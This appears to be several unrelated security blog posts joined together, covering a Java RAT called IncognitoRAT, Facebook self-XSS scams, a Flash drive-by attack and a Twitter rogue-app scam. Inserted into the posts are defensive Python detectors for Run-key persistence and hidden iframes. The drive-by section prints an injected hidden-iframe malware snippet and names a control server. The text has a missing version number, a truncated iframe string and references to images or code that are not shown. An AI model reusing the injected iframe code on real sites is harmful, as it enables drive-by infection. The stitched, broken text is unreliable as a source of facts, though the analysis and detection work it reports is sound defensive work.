I Smell a RAT: Java Botnet Found in the Wild

Most of today’s malware works on Windows and its apps, because it can affect a lot of people around the world. However, other platforms are becoming more popular every day and attracting bad guys who are starting to create malicious code for other systems. (For a few examples, see BlackHoleRAT, HellRaiser RAT, and a fake-alert scam for Mac OS X.)

A further threat is cross-platform malware that can execute on Windows and Mac using Java; this type of malware can run in a multiplatform Java Virtual Machine. IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms.

The original propagation vector of IncognitoRAT is a Windows executable, but apparently it was created using the tool JarToExe, which includes, among other features, the ability to convert .jar files into .exe files, to add program icons and version information, and to protect and encrypt Java programs. The victim’s machine has to have the Java Runtime Environment installed and must be online. As soon as the file is executed, it starts downloading a ZIP file with a pack of Java-based libraries to perform several remote activities:

  • Java Registry Wrapper: Used to access the Windows Registry and create an entry in Software\Microsoft\Windows\CurrentVersion\Run to execute the malware every time the computer starts
  • Java Remote Control: To view and take remote control (keyboard and mouse) of an infected machine
  • JLayer – MP3 Library: To remotely play an MP3 file on the infected machine
  • RNP-VideoPlayer: To play videos remotely
  • JavaMail: Optional Java package to send stolen information to an email account
  • Freedom for Media Java: Open-source alternative to the official Java Media Framework; used by the malware to watch and record images from a remote webcam

In addition to those libraries, the downloader drops the following .jar components:

  • JavaUpdater.jar: Decrypts the directory (full path) that will be created by the malware to place all the components on the infected machine. It implements TripleDES encryption and decryption methods. Finally, the component executes the principal malware, Server.jar, using the common instructions to run Java applications in Windows (java -jar %malwarepath%/Server.jar).
  • Server.jar: Runs in the background collecting keystrokes using a DLL designed to hook the keyboard on the infected machine. It also waits for commands sent from the control server to use the libraries described above and perform other actions, such as sending the captured keystrokes in a text file to an FTP server or an email account, viewing and recording the remote webcam, performing distributed denial-of-service attacks, taking remote control of the machine, etc.
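The persistence described above (a Run-key entry that launches a .jar with `java -jar` from a user-writable path) is something a defender can hunt for in exported Run-key values. The following is an added example, not code from the original post or from the malware; the Run-key entries it scans are constructed samples, not values taken from a real infection.

```python
import re

# Constructed sample Run-key values (name -> command line). The paths and names
# are invented for this example and are not indicators from the original post.
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "JavaUpdater": r'java -jar "C:\Users\alice\AppData\Roaming\.cache\Server.jar"',
    "SunJavaUpdateSched": r'"C:\Program Files\Common Files\Java\Java Update\jusched.exe"',
    "Updater": r'C:\Windows\Temp\up\javaw.exe -jar C:\Windows\Temp\up\JavaUpdater.jar',
}

# Directories an unprivileged user can write to; a jar launched from here at
# logon is far more suspicious than one under Program Files.
USER_WRITABLE = re.compile(r"(\\AppData\\|\\Temp\\|\\Users\\Public\\)", re.I)
# java or javaw (optionally .exe, optionally quoted) followed by -jar.
JAVA_LAUNCH = re.compile(r'(^|[\\\s"])javaw?(\.exe)?"?\s+(-\S+\s+)*-jar\b', re.I)

def split_command(cmd):
    """Split a Windows command line on spaces while keeping quoted paths intact."""
    return re.findall(r'"[^"]*"|\S+', cmd)

def jar_path(cmd):
    """Return the .jar argument that follows -jar (quotes stripped), or None."""
    parts = split_command(cmd)
    for i, part in enumerate(parts):
        if part.lower() == "-jar" and i + 1 < len(parts):
            return parts[i + 1].strip('"')
    return None

def suspicious_run_entries(entries):
    """Return (name, jar, reasons) for every Run-key value that launches a jar."""
    findings = []
    for name, cmd in entries.items():
        if not JAVA_LAUNCH.search(cmd):
            continue
        jar = jar_path(cmd)
        reasons = ["launches a jar from the Run key"]
        if jar and USER_WRITABLE.search(jar):
            reasons.append("jar lives in a user-writable directory")
        if USER_WRITABLE.search(split_command(cmd)[0]):
            reasons.append("java binary itself is in a user-writable directory")
        findings.append((name, jar, reasons))
    return findings

if __name__ == "__main__":
    for name, jar, reasons in suspicious_run_entries(SAMPLE_RUN_ENTRIES):
        print(f"{name}: {jar} -> {', '.join(reasons)}")
```

On a live host the same function can be fed the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM equivalent) instead of the constructed dictionary.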

One interesting feature of this botnet that we could not replicate during our analysis is its ability to “crash” the system. Apparently, it is a fake crash because in the dropped files we found a curious image that may appear on the infected machine:

According to public information, this malicious code is available for Windows, Mac OS X, and iPhone/iPad (the last only to control infected computers). However, we’ve seen only the PC version in a downloader/dropper in the wild. McAfee products detect this malware in our latest DATs as JV/IncognitoRAT.

Manual Script Scams on Facebook Generating Event Invitations

We know that Facebook scammers can be very creative and that they are experimenting with new ways to achieve their goals. Besides the omnipresent malicious Facebook apps that will steal the user’s permissions to post to his or her wall, we currently see a rise in the number of manual script attacks, with a few hundred thousand users falling victim daily.

The user is lured with a bait message to a prepared site. The all-time favourite “See who viewed your profile” is used a lot these days, but we have seen others offering free credits for social games and the like. This landing page could be a Facebook page, a Facebook application page, or a remote site on some domain. It asks the user to copy some simple-looking JavaScript into the browser address bar and press the ‘Enter’ key.

The scammers want to ensure that users are not strained by the simple step-by-step instructions. That’s why, if you scroll down the page, they have actually created videos on YouTube that explain exactly how to copy and paste the JavaScript code. For once, this video plays without fake surveys or hidden click-jacking attacks, but of course these tricks could be used as well.


Once the user follows the steps, he or she is redirected to the usual survey advertisement site before anything is revealed. These results, of course, will not be the real list of people that visited your profile, since this function does not exist in Facebook.

Under the hood, the previously executed JavaScript code misuses the logged-in user session to enumerate the friends list and start its shenanigans. Depending on the attacker’s configuration, the script will post a new bait message to the user’s wall, send chat messages to friends, tag you in posts or images, or even create an event and send an invitation to all your friends. Of course, as always, the attack is easily configurable through a toolkit. Since the script runs in the context of Facebook and uses your open session, it can do a lot with your profile: nearly everything you could do yourself.

The above described attacks are not new. We actually wrote about event spam and other attacks in our whitepaper on the risks of social networking last September.

But since they work and are harder to filter for Facebook, they might become more prevalent.

Of course, this is not a Facebook-specific problem; we have seen similar issues in other social networks. Their respective security teams are working hard to remove those attacks. Still, you should always be vigilant and sceptical when exploring social networks. Even messages from friends may lead to malicious content. If you are asked to install an application or copy and paste a script for no clear reason, then you’d better ignore it, since it is most likely a trap.

Note: We know that Facebook engineers have been working diligently on the self cross-site scripting problem. Not only have enforcement mechanisms been pursued to shut down the malicious pages and fake accounts, but Facebook has also been putting affected users through educational checkpoints to help curb the spread of the attacks.

Drive-By Downloads Attack Adobe Zero-Day Flaw

Adobe released a security advisory warning users of a zero-day vulnerability in Adobe Flash Player Versions and earlier. An exploit targeting this vulnerability was embedded inside Microsoft Excel documents and was used to deliver the malicious code to the victims. McAfee Labs performed a detailed technical analysis of the exploit and learned that the Flash Player object embedded inside the Excel document carried the malicious shellcode (shown below), which in turn loaded another Flash object to exploit the vulnerability via the classical heap-spray technique.

A couple of weeks ago we came across another variation in this attack via a drive-by download through a compromised web server.

In a drive-by download, a user visits a legitimate but infected web page and is redirected to a malicious server. Most of these infections are malicious iframes injected into a JavaScript exploit on the compromised web server, resulting in the malware installing itself onto the user’s machine. This is a common and widely known attack method.

A drive-by download usually goes like this:

During our investigation, we came across an Amnesty International website that was compromised with a JavaScript exploit appended at the end of the page. The page source looked like this:

This insertion will make the browser request the JavaScript exploit from the compromised server, which in turn contains the links to the malicious server.

Looking into the content of the JavaScript exploit, we see the embedded iframe source that redirects the browser to the malware-hosting web server, from which the exploit downloads the malicious Adobe Flash files.

var e=new Date();e.setDate(e.getDate()+1);e.setHours(0,0,0);e.setTime(e.getTime());
document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='
width=468 height=60 scrolling=no></iframe>");

The browser then connects to this URL and downloads the exploit.html page.
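The injected iframe above is positioned thousands of pixels off-screen and written via document.write(), which is exactly the pattern a web-server integrity check can look for. The following is an added example (not code from the original post); it scans a constructed sample page for iframes that are off-screen, CSS-hidden or zero-sized and points to a host other than the page’s own. All hostnames in the sample are invented.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one ordinary ad iframe plus an injected off-screen
# iframe modelled on the snippet discussed above (hostnames are invented).
SAMPLE_HTML = """
<html><body>
<iframe src="https://ads.example.net/banner" width=468 height=60></iframe>
<script>
document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://malware.example.invalid/exploit.html' width=468 height=60 scrolling=no></iframe>");
</script>
</body></html>
"""

OFFSCREEN = re.compile(r"(top|left)\s*:\s*-\d{3,}px", re.I)
HIDDEN = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.I)
# A document.write() call whose argument is a single string literal.
DOC_WRITE = re.compile(r"""document\.write\(\s*(['"])(.*?)\1\s*\)""", re.S | re.I)

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))

def collect_iframes(html):
    """Collect <iframe> tags, including ones hidden inside document.write() literals."""
    parser = IframeCollector()
    parser.feed(html)                 # script bodies are raw text to HTMLParser,
    for m in DOC_WRITE.finditer(html):  # so also parse the written-out markup
        parser.feed(m.group(2))
    return parser.iframes

def hidden_iframes(html, page_host):
    """Return (src, reasons) for iframes that are hidden and load foreign content."""
    findings = []
    for attrs in collect_iframes(html):
        style, reasons = attrs.get("style", ""), []
        if OFFSCREEN.search(style):
            reasons.append("positioned off-screen")
        if HIDDEN.search(style):
            reasons.append("hidden via CSS")
        if attrs.get("width") == "0" or attrs.get("height") == "0":
            reasons.append("zero-sized")
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        if reasons and host and host != page_host:
            reasons.append("third-party source")
        if reasons:
            findings.append((src, reasons))
    return findings
```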

This page was still alive during our investigation. Its contents looked like this:

Examining this JavaScript code, we can see that display.swf is the Flash object that contains the exploit code targeting the vulnerability. This code is embedded inside another Flash object. The file newsvine.jp2 is the actual backdoor binary, written in Visual Basic, which the shellcode downloads and then executes once the vulnerability has been exploited.

The browser makes this request to download newsvine.jp2.

Another GET request downloads the Flash object:

Next we see the Flash ActionScript that we decompiled from the Flash object. The highlighted part within the code is another embedded Flash object containing the exploit code.

While analyzing newsvine.jp2, we suspected this binary could have been authored in China because the resource section of the file has the locale ID 2052, which maps to China.

The version information of swf.exe contains the string zchuang, which could be the author’s name.

Once executed the malware attempts to connect to the control server jeentern.dyndns.org on port 80.

McAfee protection

McAfee Intrusion Prevention (formerly IntruShield) has released coverage for the Adobe Flash zero-day download Trojan under the attack signature 0x402a1700-HTTP: Adobe Flash Drive By Download Trojan. McAfee customers with up-to-date installations are protected against this malware.

UPDATE

To clarify: this exploits CVE-2011-0611 and NOT a new 0-day or new vulnerability. Sorry if the earlier lack of specificity caused any confusion!

Lord Gaga video banned? Twitter rogue app spread by scammers

Lord Voldemort and Lady Gaga

Scammers are seeding an attack against Twitter users, posing as a banned video of “Lord Gaga” in an attempt to compromise accounts.

Using a selection of newly created Twitter accounts, which have the names and avatars of young women, the tweeted-out messages all look similar:

#pssst Lord Gaga VIDEO BANNED -----> [LINK] #onethingiveneverdone #cnn

Lord Gaga banned video tweets

The mention of “Lord Gaga” refers to a running joke on Twitter today about what would happen if Harry Potter villain Lord Voldemort and Lady Gaga hooked up. The hashtags, which can vary, appear to be taken from Twitter’s trending topics in an attempt to reach a wider audience.

Interestingly, in the above screenshot all of the Twitter profiles used to seed the scam campaign have adopted the names of women beginning with the letter “B”: Bianca, Berenice, Betania, and so forth.

It has been no surprise while writing this article to find that the scammers have now run out of “B” names and have moved on to female names beginning with the letter “C”.

These aren’t your usual Twitter profiles; as can be seen in the example below, they appear to have been newly created specifically for the purpose of spreading the link.

Twitter attack seeder

What makes the profiles even more suspicious is that the only messages they have tweeted out so far have all been to the same place – a fake YouTube site, which pretends to host the banned video.

Lord Gaga video

Twitter’s security team would be wise to shut down the bogus profiles as soon as possible, before the attack spreads further, because rather than playing a music video, clicking on the player will attempt to trick users into giving a rogue application the rights to access their Twitter account.

Would you authorise this Twitter app?

An app called “money works new” hardly sounds like it would be connected to a music video, and you would be wise not to give it access to your account. But, as we’ve seen in the past, Twitter users can be tricked by such an attack into making poor decisions.

Indeed, even Lady Gaga herself appears to have recently fallen foul of such a scam on Twitter.

If you do make the mistake of authorizing the app, the scammers won’t waste any time posting the same message from your account – hoping to entrap more victims.

Rogue app victim on Twitter

If you were unfortunate enough to grant a rogue application access to your Twitter account, revoke its rights immediately by visiting Settings/Connections on the Twitter website and revoking the offending app’s rights.

Revoke app on Twitter

Don’t make it easy for scammers to make money in this way, and always exercise caution about which third-party apps you allow to connect with your social networking accounts.

If you’re on Twitter and want to learn more about threats, be sure to follow Naked Security’s team of writers.